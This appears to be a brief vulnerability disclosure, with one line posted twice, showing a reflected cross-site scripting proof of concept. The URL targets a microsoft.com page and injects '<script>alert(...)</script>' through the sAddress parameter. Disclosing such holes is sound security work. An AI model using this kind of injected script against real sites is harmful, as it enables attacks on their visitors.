The hole is here : http://www.microsoft.com/freedomtoinnovate/inc/send friend.asp?sAddress="><script>alert('Microsoft% 20hole')</script> frog
The hole is here : http://www.microsoft.com/freedomtoinnovate/inc/send friend.asp?sAddress="><script>alert('Microsoft% 20hole')</script> frog